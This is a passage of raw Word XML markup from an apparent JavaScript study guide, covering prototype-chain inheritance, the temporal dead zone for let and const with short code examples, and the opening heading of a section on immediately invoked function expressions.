        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inheritance via Prototype Chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FD218"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Objects can inherit properties and methods from other objects. When one object inherits from another, JavaScript sets the prototype of the child object to the parent object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BC984"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This allows for shared behavior and code reuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEED53F" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prototype Chain Diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4777BB50" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The prototype chain can be visualized as a linked list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC1069" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D"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person --&gt; Person.prototype --&gt; Object.prototype --&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E544D" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4E4BE" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Method Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Methods defined on the prototype are shared across all instances, which is memory efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52880D89" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Property Lookups</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: JavaScript will traverse the prototype chain during property lookups until it either finds the property or reaches the end of the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C29AB" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Object Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: New objects created using constructors or Object.create() have their prototype set according to the prototype property of the constructor function or the object passed to Object.create().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D4F42" w14:textId="77777777" w:rsidR="004812D0" w:rsidRPr="00DA2F32" w:rsidRDefault="004812D0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBA8561" w14:textId="6DDB500F" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc178383248"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the Temporal Dead Zone</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="3F294EF4" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Variable Declaration and Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6C641" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In JavaScript, variable declarations are hoisted to the top of their scope, but the initialization remains in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB06D67" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For variables declared with let or const, they are hoisted but not initialized until the execution reaches the line of code where they are defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61CE53" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This leads to a period between the start of the scope and the point of initialization where the variable exists but cannot be accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C35320D" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Temporal Dead Zone</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCDE5C8" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The TDZ is the region from the start of the block (or scope) until the variable’s initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4E0F3" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Accessing the variable in this zone results in a ReferenceError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1566CC6E" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C806D47" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949"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console.log(x); // ReferenceError: Cannot access 'x' before initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ECF9B6" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949"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let x = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F348871" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D634245" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The let x = 10; statement is hoisted, but only the declaration is hoisted, not the initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F24E7F" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Before the initialization at let x = 10;, any reference to x will throw a ReferenceError because x is in the TDZ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CAF63A"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example() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C54EAC9"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console.log(a); // undefined (var is hoisted and initialized with undefined)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BFE116"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console.log(b); // ReferenceError (TDZ for let)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2AC815"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 // ReferenceError (TDZ for const)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204AA539"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AB13C25"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var a = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D3960"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let b = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6EDADD"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c = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACF1299"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50947E7"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0185E55" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D519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example();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7AE8F" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202068F6" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var a is hoisted and initialized with undefined before the code runs, so no error is thrown when accessing a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16676403" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>let b and const c are hoisted but not initialized, resulting in a TDZ. Therefore, trying to access b or c before their initialization results in a ReferenceError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177474E0" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Why Does the Temporal Dead Zone Exist?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4682D" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The TDZ helps prevent errors and bugs that arise from accessing variables before they are ready (i.e., before they are initialized).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490D6608" w14:textId="77777777" w:rsidR="00D51949" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51949" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It reinforces block-scoped behavior for let and const variables, ensuring they are used only after they have been explicitly initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2652F9" w14:textId="77777777" w:rsidR="004812D0" w:rsidRPr="00DA2F32" w:rsidRDefault="004812D0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7A130C" w14:textId="7D01E780" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc178383249"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is Immediately Invoked Function Expression</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="6728DB51" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
